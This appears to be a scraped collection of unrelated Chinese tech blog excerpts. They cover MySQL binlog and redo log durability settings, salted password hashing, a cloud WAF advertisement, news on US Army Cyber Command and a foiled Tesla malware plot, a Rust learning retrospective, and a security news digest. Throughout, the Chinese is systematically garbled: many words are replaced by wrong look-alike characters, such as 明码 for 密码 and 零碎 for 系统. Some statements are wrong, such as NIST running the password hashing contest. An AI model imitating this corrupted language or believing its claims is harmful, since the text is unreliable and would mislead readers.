安全

MySQL作为以后最风行的关系型数据库，在各个行业的零碎中扮演着最重要的角色。随着大家对数据价值认可的逐渐加深，数据的可靠性是最常被问到的一个问题。MySQL是如何保证数据可靠性的？京东智联云RDS-MySQL又做了哪些优化和新个性来保障用户数据的可靠性和一致性？本篇文章将为大家一一揭秘。MySQL的Innodb存储引擎反对ACID（原子性Atomicity，一致性Consistency，隔离性Isolation，持久性Durability）个性，正是因为保障了一致性和持久性，所以数据才是牢靠的。很多关系型数据库为保障数据库的可靠性，同时最大限度地晋升性能，采纳了预写日志（Write-Ahead Logging）的办法，MySQL也不例外。它将数据变动先写入日志，而后立即返回给客户端更新胜利，真正的数据再异步更新到磁盘的数据文件。如果两头零碎产生故障，只有日志在数据就不会失落，这就保障了数据的可靠性。 MySQL写入的日志就是binlog和redo log文件，上面咱们来介绍下两种日志的写入流程。 事务执行过程中，MySQL会将所有变更记录到binlog cache中，在事务commit的时候一起写入binlog文件中。 binlog cache是由参数binlog_cache_size管制，默认32KB，如果事务很大，变更内容超过了binlog cache，则会写到磁盘中。通过命令show global status like 'Binlog_cache_disk_use';能够查看binlog cache写入磁盘的次数，如果数量过多，倡议调大binlog_cache_size参数值。 每个线程都会调配binlog cache，然而都共用一份binlog文件。流程图如下： 在写入到零碎的日志文件中有两个步骤，write和fsync。wirte是写入操作系统的缓存，fsync是长久化到磁盘文件，这个操作会占用零碎的IOPS，而它们操作的机会是通过参数sync_binlog管制。 sync_binlog=0，事务提交时，只做write操作，由操作系统本人管制fsync操作。这个是最危险的，一旦操作系统宕机，binlog cache中的变更内容全副会失落。sync_binlog=1，事务提交时，都会做write和fsync操作。安全性最高，然而性能损耗也是最大的。sync_binlog=N，事务提交时，会做write操作，累积N个事务时做fsync操作。一旦操作系统宕机，会失落binlog cache中局部变更内容。 事务执行过程中，也是先写入内存redo log buffer中，而后再写入到磁盘文件。其中redo log buffer是所有线程共用的。与binlog写到文件一样，写redo log也有write和fsync两个操作，它们操作的理论是通过参数innodb_flush_log_at_trx_commit管制。 nnodb_flush_log_at_trx_commit=0，事务提交时，只将变更内容写到redo log buffer，由后盾Master线程每秒write和fsync到磁盘文件。innodb_flush_log_at_trx_commit=1，事务提交时，执行write和fsync操作。这是最平安的配置。innodb_flush_log_at_trx_commit=2，事务提交时，只执行write操作，即只写到操作系统的缓存中，由后盾Master线程每秒fsync到磁盘文件。对于这个参数与数据可靠性之间的关系如下表所示： innodb_flush_log_at_trx_commit 数据库过程异样 操作零碎异样 0 失落最多1s的数据 失落最多1s的数据 1 不丢数据 不丢数据 2 不丢数据 失落最多1s的数据 参数sync_binlog=1与innodb_flush_log_at_trx_commit=1就是DBA常说的“双1”配置，也是线上环境数据最平安最牢靠的配置。 再比照下binlog和redo log的不同之处： binlog redo log 记录者 MySQL server Innodb引擎 记录工夫 事务commit的时候 多种条件触发，随时记录 记录内容 逻辑日志 row格局或者statement格局 物理日志 数据页的变动，幂等的 binlog和redo log是如何配合起到数据可靠性的作用呢，就不得不提到两阶段提交。它能够保障binlog和redo log的数据一致性。下图是事务提交时两个日志的记录流程： ...

作者：__程序员赵鑫原文：https://www.cnblogs.com/xinzh...咱们数据库的权限治理非常严格，敏感信息开发工程师都看不到，明码明文存储不行吗？不行。存储在数据库的数据面临很多威逼，有应用程序层面、数据库层面的、操作系统层面的、机房层面的、员工层面的，想做到百分百不被黑客窃取，十分艰难。 如果明码是加密之后再存储，那么即使被拖库，黑客也难以获取用户的明文明码。能够说，明码加密存储是用户账户零碎的底裤，它的重要性，相当于你单独出远门时缝在内衣里钱，尽管你用到他们的概率不大，但关键时刻他们能救命。 那用加密算法比方AES，把明码加密下再存，须要明文的时候我再解密。不行。这波及到怎么保留用来加密解密的密钥，尽管密钥个别跟用户信息离开存储，且业界也有一些成熟的、基于软件或硬件的密钥存储计划。但跟用户信息的保留一样，想要密钥百分百不泄露，不可能做到。用这种形式加密明码，可能升高黑客获取明文明码的概率。但密钥一旦泄露，用户的明文明码也就泄露了，不是一个好办法。 另外，用户账户零碎不应该保留用户的明文明码，在用户遗记明码的时候，提供重置明码的性能而不是找回明码。 保留所有明码的HASH值，比方MD5。是不是就能够了？不是所有的HASH算法都能够，精确讲应该是Cryptographic Hash。Cryptographic Hash具备如下几个特点： 给定任意大小任意类型的输出，计算hash十分快；给定一个hash，没有方法计算得出该hash所对应的输出；对输出做很小改变，hash就会产生很大变动;没有方法计算失去两个hash雷同的输出;尽管不是为加密明码而设计，但其第2、3、4三个个性使得Cryptographic Hash非常适合用来加密用户明码。常见的Cryptographic Hash有MD5、SHA-1、SHA-2、SHA-3/Keccak、BLAKE2。 从1976年开始，业界开始应用Cryptographic Hash加密用户明码，最早见于Unix Crypt。但MD5、SHA-1已被破解，不适宜再用来保留明码。 那我保留用户明码的SHA256值。不行。黑客能够用查问表或彩虹表来破解用户明码。留神是破解明码不是破解sha256，能依据sha256破解明码的起因是，用户明码往往须要大脑记忆、手工输出，所以不会太简单，往往具备无限的长度、确定的取值空间。 短的取值简略的明码能够用查问表破解比方8位数字明码，一共只有10^8=100000000种可能。一亿条数据并不算多，黑客能够提前吧0-99999999的sha256都计算好，并以sha256做key明码为value存储为一个查问表，当给定sha256须要破解时，从表中查问即可。 取值绝对简单，且长度较长的明码，能够用彩虹表破解比方10位，容许数字、字母大小写的明码，一共有(10+26+26)^10~=84亿亿种可能，记录十分之多难以用查问表全副保存起来。这时候黑客会用一种叫做彩虹表的技术来破解，彩虹表用了典型的计算机世界里解决问题的思路，工夫空间斗争。在这个例子外面，空间不够，那就多花一些工夫。在彩虹表中，能够将全副的sha256值转化为长度雷同的若干条hash链，只保留hash链的头和尾，在破解的时候先查问失去sha256存在于哪条hash链中，而后计算这一条hash链上的所有sha256，通过实时比对来破解用户明码。 上图图展现了一个hash链长度为3的彩虹表，因为在hash链中须要将hash值应用R函数映射回明码取值空间，为了升高R函数的抵触概率，长度为K的hash链中，彩虹表会应用k个R函数，因为每次迭代映射回明码空间应用的R函数不一样，这种破解办法被称作彩虹表攻打。 理论的状况Hash链要比远比上例更长，比方咱们的例子中全副的84亿亿个sha256存不下，能够转化为840亿条长度为1千万的sha链。对彩虹表原理感兴趣的话，能够浏览它的维基百科。 网路上甚至有一些曾经计算好的彩虹表能够间接应用，所以间接保留用户明码的sha256是十分不平安的。 怎么防止彩虹表攻打？简略讲，就是加盐。一般来讲用户明码是个字符串key、盐是咱们生成的字符串salt。原来咱们保留的是key的hash值HASH(key)，当初咱们保留key和salt拼接在一起的hash值HASH(key+salt)。 这样黑客提前计算生成的彩虹表，就全都生效了。 盐应该怎么生成，随机生成一个字符串？这是个好问题，并不是加个盐就平安了，盐的生成有很多考究。 应用CSPRNG（Cryptographically Secure Pseudo-Random Number Generator）生成盐，而不是一般的随机数算法；CSPRNG跟一般的随机数生成算法，比方C语言规范库外面的rand()办法，有很大不同。正如它的名字所揭示，CSPRNG是加密平安的，这意味着用它产生的随机数更加随机，且不可预测。常见编程语言都提供了CSPRNG，如下表： 盐不能太短想想查问表和彩虹表的原理，如果盐很短，那意味着明码+盐组成的字符串的长度和取值空间都无限。黑客齐全能够为明码+盐的所有组合建设彩虹表。 盐不能重复使用如果所有用户的明码都应用同一个盐进行加密。那么不论盐有多简单、多大的长度，黑客都能够很容易的应用这个固定盐从新建设彩虹表，破解你的所有用户的明码。如果你说，我能够把固定盐存起来，不让他人晓得啊，那么你应该从新读一下我对于为什么应用AES加密不够平安的答复。 即使你为每一个用户生成一个随机盐，安全性依然不够，因为这个盐在用户批改明码时重复使用了。该当在每一次须要保留新的明码时，都生成一个新的盐，并跟加密后的hash值保留在一起。 留神：有些零碎用一个每个用户都不同的字段，uid、手机号、或者别的什么，来作为盐加密明码。这不是一个好主见，这简直违反了下面全副三条盐的生成规定。 那我本人设计一个黑客不晓得的HASH算法，这样你的那些破解办法就都生效了。不能够。 首先如果你不是一个密码学专家，你很难设计出一个平安的hash算法。不服气的话，你能够再看一遍下面我对于Cryptographic Hash的形容，而后想一想本人怎么设计一个算法能够满足它的全副四种个性。就算你是基于已有的Cryptographic Hash的根底下来设计，设计完之后，也难以保障新算法依然满足Cryptographic Hash的要求。而一旦你的算法不满足平安要求，那么你给了黑客更多更容易破解用户明码的办法。 即使你能设计出一个他人不晓得的Cryptographic Hash算法，你也不能保障黑客永远都不晓得你的算法。黑客往往都有能力拜访你的代码，想想柯克霍夫准则或者香农公里： 明码零碎应该就算被所有人晓得零碎的运作步骤，依然是平安的。为每一个明码都加上不同的高质量的盐，做HASH，而后保留。这样能够了吧？以前是能够的，当初不行了。计算机硬件飞速发展，一个古代通用CPU能以每月数百万次的速度计算sha256，而GPU集群计算sha256，更是能够达到每秒10亿次以上。这使得暴力破解明码成为可能，黑客不再依赖查问表或彩虹表，而是应用定制过的硬件和专用算法，间接计算每一种可能，实时破解用户明码。 那怎么办呢？回忆下面对于Cryptographic Hash个性的形容，其中第一条： 给定任意大小任意类型的输出，计算hash十分快Cryptographic Hash并不是为了加密明码而设计的，它计算十分快的这个个性，在其余利用场景中十分有用，而在当初的计算机硬件条件下，用来加密明码就显得不适合了。针对这一点，明码学家们设计了PBKDF2、BCRYPT、SCRYPT等用来加密明码的Hash算法，称作Password Hash。在他们的算法外部，通常都须要计算Cryptographic Hash很屡次，从而减慢Hash的计算速度，增大黑客暴力破解的老本。能够说Password Hash有一条设计准则，就是计算过程可能按要求变慢，并且不容易被硬件加速。 应该应用哪一种Password Hash？PBKDF2、BCRYPT、SCRYPT已经是最罕用的三种明码Hash算法，至于哪种算法最好，多年以来明码学家们并无定论。但能够确定的是，这三种算法都不完满，各有毛病。其中PBKDF2因为计算过程须要内存少所以可被GPU/ASIC减速，BCRYPT不反对内存占用调整且容易被FPGA减速，而SCRYPT不反对独自调整内存或计算工夫占用且可能被ASIC减速并有被旁路攻打的可能。 2013年NIST（美国国家标准与技术研究院）邀请了一些明码学家一起，举办了明码hash算法大赛（Password Hashing Competition），意在寻找一种规范的用来加密明码的hash算法，并借此在业界宣传加密存储用户明码的重要性。大赛列出了参赛算法可能面临的攻打伎俩： [X] 加密算法破解（原值还原、哈希碰撞等，即应满足Cryptographic Hash的第2、3、4条个性）;[X] 查问表/彩虹表攻打；[X] CPU优化攻打；[X] GPU、FPGA、ASIC等专用硬件攻打；[X] 旁路攻打;最终在2015年7月，Argon2算法博得了这项比赛，被NIST认定为最好的明码hash算法。不过因为算法过新，目前还没据说哪家大公司在用Argon2做明码加密。 一路问过去好累，能不能给我举个例子，大公司是怎么加密用户明码的？往年（2016）Dropbox曾产生局部用户明码数据泄露事件，过后其CTO示意他们对本人加密明码的形式很有信念，请用户释怀。随后，Dropbox在其官网技术博客发表名为《How Dropbox securely stores your passwords》的文章，讲述了他们的用户明码加密存储计划。 ...

「网络安全为人民，网络安全靠人民」，一年一度的国家网络安全宣传周拉开帷幕。网络安全的重要性显而易见，在往年更是受到了特地关注。在疫情影响下，越来越多的企业放慢了向私有云的服务迁徙，在技术升级的同时，针对敏感云工作负载和数据的攻打也随之而来。特地是游戏、直播、金融、大数据等行业，产品运营商面临大量黑产通过歹意流量挤占网络带宽、扰乱失常经营的状况，增强平安防备迫不及待。 依据《2020 上半年 DDoS 威胁报告》数据显示，以后业界最大 DDoS 攻打峰值流量达到 2.3T、云上 DDoS 攻打次数大幅增长 45%、百 G 以上攻打次数同比翻番。在如此严厉的安全形势之下，咱们应该如何应答日益简单的攻打威逼？ 理解网安威逼，能力对症下药首先，咱们须要理解在私有云主机服务上次要会面临哪些网络攻击威逼，能力有针对性地进行防护。CC 攻打和 DDoS 攻打，是目前网络上的最常见的两种平安攻击方式。 CC 攻打次要是通过发送大量数据包，使服务器 CPU 长时间处于 100%，导致服务器网关梗塞甚至死机，使实在的用户无奈失常地登录拜访，给用户造成了很差的拜访体验。当被 CC 攻打时，最直观的体现就是在排除业务变动因素后，利用访问量忽然激增，造成用户无奈失常拜访服务器。 DDoS 的表现形式次要有两种，一种为流量攻打，次要是针对网络带宽的攻打，即大量攻打包导致网络带宽被阻塞，非法网络包被虚伪的攻打包吞没而无奈达到主机；另一种攻打为资源耗尽，即通过大量攻打包导致主机的内存被耗尽而造成无奈提供网络服务。如果你的业务有遇到过以下状况那么可能就是遇到了 DDoS 攻打：(1) 网站拜访忽然间变得十分迟缓或无法访问，服务器上存在着大量期待的「TCP 半连贯」状态;(2) 网络中充斥着大量无用的数据包;(3) 涌现高流量无用数据，造成网络拥塞，使主机无奈失常和外界分割。 面对日益严厉的网络攻击局势，为了爱护客户的利用和数据安全，七牛云推出了高防平安产品系列。 阻挡CC攻打的固若金汤，网站利用防火墙针对 CC 攻打，七牛云提供了网站利用防火墙 WAF（Web Application Firewall），这是一款基于 AI 的一站式 Web 业务经营危险防护计划。能给予网站无效的平安保障。七牛云网站利用防火墙能够无效进攻 SQL 注入、XSS 跨站脚本、木马上传、非受权拜访等 OWASP 攻打。此外还能够无效过滤 CC 攻打、提供 0day 漏洞补丁、避免网页篡改等多种手段全方位爱护网站的零碎以及业务平安。 在网站利用防火墙 WAF（Web Application Firewall）的帮忙下，用户可一键无缝接入百 G 抗 DDoS 能力，轻松应答敏感大流量 DDoS 攻打问题，无惧突发危险；在业务防护方面，通过高级 Bot 行为治理、CC 防护人机辨认、DNS 劫持检测，满足业务平安经营防护需要；30 线独享 BGP IP 链路接入防护，服务提早业界最低，保障受护业务访问速度；更能基于 AI 引擎 WAF，交融亿级威逼情报，打造更聪慧的威逼辨认大脑，精准无效拦挡 Web 威逼针对 DDoS 攻打。 ...

【快讯】成军整十载，筹备7年，耗资3.66亿美金……9月3日，美国陆军网络司令部正式搬迁至佐治亚州戈登堡。这一次，美国消耗大手笔的“迁徙”，不仅意味着美国陆军网络司令部的“集结号”已吹响。与此同时，它还公然宣告要花费更少工夫来保卫美国网络安全，用更多工夫来攻打网络劲敌。仿佛，一场关乎天时、人和、地利的“精心策划”正在演出。随同着网络司令部秒变黑客总部，_美国其心也昭然若揭，其寰球网络新战斗正在打响。_ 美国陆军网络司令部（ARCYBER）：成立于2010年10月1日，它是美国网络司令部的陆军服务部门，旨在成为陆军与内部组织无关信息作战和网络空间的惟一联系点。依据受权或批示，指挥进行电子战、信息和网络空间的综合作战口头，以确保美军在网络空间和信息环境中的口头自在。 筹备7年耗资3.66亿美元 美陆军网络司令部正式“乔迁” 当地工夫9月3日，美国陆军网络司令部举办隆重庆祝典礼： 庆贺其从弗吉尼亚州贝尔沃堡（Fort Belvoir）迁徙至佐治亚州戈登堡（Fort Gordon）。 典礼上，揭幕了这座耗资3.66亿美元、占地336000平方英尺的指挥部新大楼，并正式将这座大楼命名为Fortitude Hall（刚毅堂）。 值得注意的是，对于这次看似稀松平时，却又“大手笔”式“搬迁”，将美国打响寰球网络战的野心裸露无疑。 其一，网络司令部秒变黑客总部 开篇咱们已介绍到，美陆军网络司令部成立10年无余，然而，其网军力量却四散于美三大州陆军指挥部之中。 所以这一迁徙，令网络司令部秒变黑客总部，无疑吹响了美国陆军网络司令部整军力量的“集结号”。 其二，美网络武器零碎的进一步壮大 此外，此次落地新址，还标记着美国网络武器零碎的进一步壮大。陆军网络司令部指挥官史蒂夫·弗加蒂中将就就此发言道： “_陆军网络司令部新总部不仅是一座装有大量计算机的大型修建，更是一个军用网络武器零碎，将来咱们将在网络攻击中表演更间接的角色。以更少的工夫来保卫美国网络安全，用更多的工夫来攻打网络劲敌。_” 然而，这也并不单是一位美国指挥官振奋军心之言，美国陆军网络司令部搬迁新址还极具劣势。能够说，一场关乎地利、天时、人和的“精心策划”正在演出…… 【1】 “天时”——新高科技口头核心 新址地点——美国佐治亚州戈登堡，它曾历经两次世界大战，能够说这是充斥了军事历史色调的中央。 然而，随同技术的倒退，该地也从实战营垒逐渐降级为现在的“新高科技口头核心”，不仅美国国家安全局（NSA）的佐治亚州分行散布在此，美国陆军通信部队分支的陆军信号部队也“定军于此”。 能够说，在戈登堡这片土地上，科学技术、网络能力绝非个别，而美国陆军网络司令部的“入驻”更加锦上添花。 正如弗加蒂所说： “_咱们当初可能领有国防部中最好的网络，领有300多台服务器，超过3,000英里的布线以及与之的高速连贯美国和盟国的寰球总部。这将使陆军网络司令部可能感知、了解、决策和应答新兴的寰球IE条件，以无可比拟的速度为陆军高级领导，地区陆军和联结指挥官提供了抉择，从而实现战略决策劣势。_” 【2】 “人和”——人才培养与练兵核心 乔迁之后的、全新的陆军网络司令部，不仅集结三大洲网络指挥部专家。与此同时，戈登堡更是纳新网络士兵“训练营”。陆军副部长詹姆斯·麦克弗森（James McPherson）就对此示意： “_这一次，咱们整合了咱们所有的网络空间工作，并将运营商、培训师和政策制定者汇集在了一起。_” 经验丰富的网络专家，不仅可能承受高级综合性业余教育，也能够在发现新威逼或开发新技术后走进“训练营”分享传授教训、疾速共享新想法，以应答“变幻多端”的网络作战新时局。正如弗加蒂所说：“咱们运作的越多、学习的越快，就能够在下一次迭代中运行得越快。” 【3】 “地利”——网络战时下的趁势之举 刚刚过来的8月，美国军方高级网络官员称，其网络作战方向正在产生转变：由过来“被动和进攻的态势”演变为更“踊跃简单的威逼型态势”。 加之美国大选在即，黑客袭击频发。外部政策调整，内部忧患之下，能够说，美国陆军网络司令部的新址迁徙，更像是美国网络战新布局下的“趁势而为”。 然而，不论是政治反抗还是全新网络策略布局，全域网络之战早已没有进路可言。即使是堪称“世界网络霸主”的美国也未曾有一丝一毫的懈怠。紧跟世界局势，踊跃落地网络战略部署。 **寰球网络新战斗已打响 ** 美陆军网络司令部倒退路线图流出 然而，更为值得注意的是，美陆军网络司令部总部地址迁徙，仅为陆军网络司令部的倒退路线图的第一阶段，更为“雄伟”的布局仍在继续布局中…… 据华盛顿音讯，美国陆军网络司令部司令斯蒂芬·福格蒂形容了将来十年的信息战三阶段打算。 该文章发表在西点军校的陆军网络研究所《网络进攻评论》的特刊中，提及的十年打算为美国陆军网络司令部的前进方向提供了路线图。 材料显示，美国陆军网络司令部倒退分为三大阶段： （1）第一阶段（现如今） 届时，该司令部心愿建成新打算和体制的雏形。美陆军网络司令部总部将从弗吉尼亚州贝尔沃堡迁徙到佐治亚州戈登堡。 （2）第二阶段（从2021年到2027年） 在这段时间，美陆军部队将进行“试验和翻新”，同时会应用第一阶段构建的新部队单元和能力。 （3）第三阶段（从2028年开始） 该阶段重点是多域战能力。美陆军对其的预期是，不论陆军网络司令部如何变动，都应该可能胜利遂行信息战和非传统作战，执行对对等对手的情报侦察，并展现弱小的威慑力。 能够说，美国作为世界网络霸主，在网络战部署上从未进行、从未松散。它精心的布局，无疑是在酝酿着一场寰球网络新战斗。 智 库 时 评 以后，网络时局瞬息万变，攻防两端的转换、明暗交错的反抗，世界各国置身其中，任谁都无奈置身事外。 现在，美国先行一步，利用全新美国陆军网络司令部之布局“整装待发”，这为寰球网络安全威逼敲响了警钟。 咱们酷爱战争，但和平来了，咱们不能畏惧。时局紧迫下，任何一个国家唯有紧随平安时代的步调，方能在高阶反抗中立于不败之地。 参考链接： securityweek－《陆军网络司令部实现向格鲁吉亚基地的转移》

【快讯】科技力量正以惊人的速度扭转世界，信息技术正成为人类文明的“外围源能源”。咱们经验的数字时代，正在成为人类历史中又一富丽篇章。近日，科技狂人马斯克再放大招，重磅推出Neuralink“_脑机交互_”设施，号称“数字永生”。然而，就在同一天，马斯克公开抵赖其特斯拉工厂正面临重大的网络安全威逼。着眼数字时代，高价值注定催生高风险，网络安全显然是最不可漠视的重要一环。 马斯克Neuralink发布会放大招 脑机交互逐鹿“数字永生” 上周末，“科技狂人”埃隆·马斯克（Elon Musk）完结了一场世界级震撼发布会。 这一次，他代表的不是SpaceX，也不是特斯拉，而是他的守业公司Neuralink的最新技术：在大脑和计算机之间建设数字连贯，也就是咱们熟知的“脑机接口”。 具体而言，这一“脑机接口”的新设施：只有硬币大小，通过手术植入头骨中，就像装置在大脑上的Fitbit，充斥电可用一整天，更为重要的是脑内电波信号清晰可见，能够更为进一步理解其大脑内的流动。 发布会上，马斯克以线上直播的模式展现了一只赛博朋克小猪“格特鲁德”，而Neuralink的最新设施已无损植入该猪脑两个月无余。 能够说，此举标记着寰球数字孪生时代下脑机交互的跨时代冲破！尤其当依此类推，该试验在人体上时，也能够感知甚至改善人体大脑的流动。所以，当谈及该接口设施的作用，马斯克示意：“_人类或多或少都会呈现大脑衰弱问题，将Neuralink设施植入脑中，心愿能帮忙解决大脑或者脊髓的重要问题。_” 此外，从久远来看，Neuralink还示意，“脑机接口”技术将会在5年内让人们不用应用语言，间接通过大脑交换，实现真正的心灵感应。 在此之下，脑机号召特斯拉、脑部记忆存储以至于“数字永生”都将不再是光影造梦，而皆有可能成为事实。 然而，事实与幻想的差距，总是让人措手不及！ **马斯克科技造梦背地 仍无奈挣脱网络攻击者的“梦魇”** 太空和大脑皆不放过的马斯克，却无奈解脱网络攻击的“梦魇”！ 就在Neuralink发布会召开的同一天，埃隆·马斯克以其特斯拉首席执行官的身份，亲自发推特证实——俄罗斯黑客正以特斯拉工厂为指标部署网络袭击。 音讯称，美国联邦调查局（FBI）挫败了27岁的俄罗斯国民Egor Igorevich Kriuchkov在特斯拉在内华达州Sparks工厂内招募内部人员的打算。 Kriuchkov通过WhatsApp接触到特斯拉内华达工厂的一名员工，并以100万美元贿赂该员工用恶意软件感化并毁坏特斯拉的外部网络。 然而，有意思的是，据Kriuchkov自己介绍，此次攻打采纳“暗渡陈仓”战术，分为两步开展： 第一步，掩护性攻打。 首先，对公司发动内部分布式拒绝服务（DDoS）攻打。吸引特斯拉算机平安人员的全副注意力，为二次网络攻击做掩护。 第二步，实质性攻打。 攻打将利用恶意软件从计算机网络中窃取数据。攻打得手后攻击者会威逼特斯拉，如果不领取大笔赎金，便会将重要数据公开。 能够说，此次针对特斯拉工厂所应用的“内鬼浸透”攻打法，实属业界习用攻打伎俩。而面对马斯克执掌的宏大“科技帝国”，一个小小的“策反计”都极有可能酿成不可挽回的结果。 智 库 时 评** 从SpaceX到Boring，从特斯拉到Neuralink。埃隆·马斯克誓要“上天入地”，“玩转”车脑人脑，全畛域一直向人类科技发动最前沿挑战。 然而，“一面地狱，一面天堂”，一端是所有皆可编程，万物皆可互联的数字孪生时代，而另一端高级网络威逼攻打持续性降级。 即使是一个小小的安全漏洞藏身“隐秘的角落”，一直浸透，也可能掀起一场毁灭性攻打浪潮。 正视当下，一个时代的席卷而至从不会留给咱们太多工夫思考。面对数字信息时代的明天，网络安全更是任重而道远，铸就网络安全之基石，时不我待！ 补充材料：埃隆·马斯克（Elon Musk），出生于南非的美国企业家。马斯克因身为SpaceX创办人，以及特斯拉汽车和PayPal（原X.com）的联结创办人而闻名。目前，马斯克负责Space X的执行长兼首席设计师、特斯拉汽车执行长兼产品架构师、以及SolarCity的主席；与此同时，他还是古代第一辆可行电动车-TeslaRoadster的联结设计者之一。

作者：谢敬伟，江湖人称“刀哥”，20年IT老兵，数据通信网络专家，电信网络架构师，目前任Netwarps开发总监。刀哥在操作系统、网络编程、高并发、高吞吐、高可用性等畛域有多年的实践经验，并对网络及编程等方面的新技术有浓重的趣味。近段时间在学习钻研Rust。都说Rust学习曲线平缓，感觉果然如此。之前学习Go，基本上没有专门去看语法，只是在须要的时候上网查一查，再花点工夫看看大型的开源软件我的项目，差不多就能够写生产级别的代码了。而Rust则不然，至多自己花了差不多两三周的工夫专门学习语法，然而去看开源的我的项目仍然感觉很吃力，又花了一些工夫才搞明确了Rust的几种编码模式，特地是异步模式，又分为poll循环的形式、combinator形式和.await协程的形式，各种坑比拟多，填坑的过程还是比拟吃力的。 整个大概两个多月学习过程中，已经碰到过很多的问题，在网上浏览过很多的文章寻找答案，也和有教训的开发者进行过微信交换，总体感觉Rust还是一个正在倒退中的语言，不同版本之间有一些差别，特地是Rust并没有提供一个十分残缺runtime（也能够了解成是凋谢的，提供了各种选项），异步编程模式还有tokio和async-std这样的营垒决裂，网上相干的材料也是泥沙俱下，对于初学者而言，有可能迷失在一些谬误的形容或者互相矛盾的各种材料中，走一段冤枉路。故而，在这里用文字将本人的学习历程和心得体会整理出来，心愿可能对别人有所帮忙。 语法相对而言，Rust的语法是挺特地的。因为有生存周期和借用查看这类独有的概念，所以语法上看上去比较复杂。作为一种古代编程语言，大量应用了泛型，然而也带来代码可读性较差的问题。置信所有的初学者都会对层层包裹的泛型参数及其限定感到头痛，可能须要破费一段时间来适应一下。而枚举类型Option<T>代替Null，错误处理Result<T,E>也是有特色的中央，然也导致相干的代码略显臃肿（集体领会，实现雷同性能，Rust代码篇幅总是较之Go代码显著更长）。总之，学习Rust，语法是第一道门槛，须要一点急躁和韧性。 “平安”和“高性能”所有权概念解决内存平安和GC的问题，是Rust语言的基石，也是整个零碎的亮点。联合Type零碎和Trait限定（Send, Sync），Rust用一种不那么直观但极为优雅的形式规定了多线程编码的基本要素。也就是说，除非写Unsafe，否则程序员无奈制作出C/C++中常见的内存double free问题，也没机会写出线程不平安的代码，这类问题在大型软件我的项目前期根本都是劫难。然而，Rust并不能解决代码的逻辑谬误。咱们一样会碰到内存透露，多线程死锁之类的问题。个别看来，多线程死锁差不多也是劫难级别的问题。此外，对于高性能，很多时候是Unsafe的同义词，而应用Unsafe，Rust就进化为C语言。因而，对于Rust“平安”和“高性能”，须要有一个辩证的意识。 同步，异步Rust提供凋谢的选项，怎么写代码是程序员的抉择。同步的代码比拟间接，把握了Rust语法就可以看懂，容易上手。当然，如果仅仅是同步模式多线程的代码，Rust差不多相当于一个增强版的C++。同步模式的代码与异步模式代码的观感上差异很大。或者说，没有专门学习过异步编程模式，很可能齐全看不懂异步的代码。异步模式对于器重I/O吞吐的利用场景意义重大，支流编程语言纷纷退出了异步模式的反对，特地是Go原生反对且只反对异步模式。然而，Rust异步编程模式须要学习除语法之外的更多内容，多了不少新的概念，还有不同格调写法，把握起来有肯定难度。类库还有诸如 tokio 与 async-std 的不同营垒，无疑很大水平地又减少了学习的难度。而无论 tokio 或是 async-std，成熟度都有欠缺，远远不如Go简略易用。然而对于应用异步编程模式的开发人员，还是很有必要理解异步模式的工作原理和技术实现，否则，面对一些绝对简单的问题可能就大刀阔斧了。 第三方类库Rust因为其高门槛，注定就是小众的。目前来看，第三方类库可能提供的轮子数量无限，品质堪忧，与同样号称零碎编程语言的Go差距微小，在劳动生产率上无奈等量齐观。如果从头开始一个大型项目，是否选用Rust，取舍值得三思。到底须要“平安”和“高性能”，还是疾速开发，尽早交付？ 开发工具这一点须要使劲吐槽。相较于应用Goland进行Go开发的轻松愉悦，应用Clion进行Rust开发堪称惨不忍睹。编辑器无奈很好地了解或开展Rust宏，因而语法提醒等性能都会生效，有点盲人摸象的感觉。调试器断点不牢靠，很多时候被迫祭出printf大法，调用栈很难提供有用的信息，被层层包裹的变量无奈查看，等等。如果说Goland能够打9分，那么Clion只能是不及格。另外，已经尝试过VSCode，感觉还不如Clion。展望未来，随着Rust被更多认可并失去更多反对，开发工具的改善和进步是能够预期的，特地是调试器，针对Rust做相干的优化后置信体验会大幅改善。然而，因为Rust语法的复杂性以及大量依赖泛型的个性，冀望Rust开发工具的体验成果达到Go开发工具的水平，预计不大事实。 网上各种材料相较于宽泛风行的Java,Go等语言，Rust的生态不可同日而语，相干材料、文献不够丰盛。特地不足高质量的中文原创内容。不少的翻译文章，原文内容丰盛，品质很高，但译者可能并没有齐全了解原文的精华，很多中央直译了事，没能讲到点子上。这时候，倡议读者找到原文比照浏览。几位Rust外围开发人员的博客，倡议关注 Rust 相干的文章或教程举荐入门教程：• Book：经典入门教程。集体感觉过于简练，略过了很多内容。 • 深入浅出Rust：中文书籍，作为语法学习很不错。内容详尽，个别中央稍显古老。 异步编程：• The Future With Futures：文章有点长远，但还是值得一读 • Asynchronous Programming in Rust：tokio 团队对于异步编程的教程，系统性地解说了异步编程的前因后果 • Async programming in Rust with async-std：async-std 团队对于异步编程的教程。外面有一个十分棒的设计实现聊天程序的教程案例。这不是一个简略的示例，至多不是用unwrap来写的简略示例… 博客：• withoutboats’ Blog ：驰名的withoutboats，博客中有十分多内容，方方面面 • stjepang’s Blog：crossbeam，smol 的作者。smol 当初是 async-std 的底层撑持。作者博客中详尽地介绍了 executor 的实现细节 • snoyman’s Blog: 解说了async fn 的原理，值得一读。博客中有一系列对于Rust的精彩文章 中文：• 最近学写 async/await 被 Rust 毒打的教训：这篇文章作者写得十分活泼具体，外面提到的问题都是亲自领会 ...

夕惕若厉,则无咎矣。 依据对现在大型网络安全攻打事件的察看剖析可知，平安产品的一直冲破与晋升迫使攻击者应用更荫蔽、更简单的攻打伎俩。而在这样的大型网络安全攻打事件中，都波及到“近程管制”、“数据加密”、“攻打勒索”这些名词。传统的基于应用层的平安解决方案，面对这类高级威逼力不从心，而基于CPU指令集的检测计划却能无效防控高级威逼。 安芯网盾作为国内内存平安畛域的开拓者和创新者，填补国内在内存平安问题方面实时检测与进攻的空白，也为客户提供了新一代高级威逼实时防护解决方案。 1、Microsoft修复了一个可能导致执行任意代码的Microsoft Azure Sphere破绽。（8.27） Microsoft Azure Sphere 20.07的签名代码执行性能中存在一个近程代码执行破绽。攻击者能够执行将READ_IMPLIES_EXEC设置为壳的Shellcode来触发此破绽，导致过程的堆从可写文件变为可执行文件。 2、Lazarus团伙通过LinkedIn招聘广告攻打了加密货币公司。 （8.25） 